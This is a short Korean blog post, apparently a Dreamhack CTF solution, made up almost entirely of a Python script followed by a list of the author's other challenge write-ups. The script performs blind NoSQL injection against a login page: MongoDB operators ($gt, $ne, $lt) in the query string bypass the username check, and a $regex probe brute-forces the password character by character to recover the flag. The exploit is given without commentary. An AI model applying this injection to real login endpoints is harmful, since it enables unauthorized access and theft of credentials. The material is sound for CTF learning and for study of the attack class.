728x90
import requests
import string
url = "http://host1.dreamhack.games:22637/login"
s = string.digits + string.ascii_uppercase + string.ascii_lowercase + "{}"
result = ""
for i in range(32):
for idx, c in enumerate(s):
payload = "?uid[$gt]=adm&uid[$ne]=guest&uid[$lt]=d&upw[$regex]={" + (result+c)
print(payload)
res = requests.get(url+payload)
if res.text.find("admin") != -1:
result += s[idx]
print(result)
break
flag = "DH" + result + "}"
print(flag)
728x90
'호그와트' 카테고리의 다른 글
| 드림핵 xss filtering bypass advanced (0) | 2022.05.12 |
|---|---|
| 드림핵 호박 게임 (0) | 2022.04.20 |
| 드림핵 spring view (0) | 2022.04.06 |
| 드림핵 sint (0) | 2022.03.01 |
| 대나무숲 1 돌파 (0) | 2022.02.28 |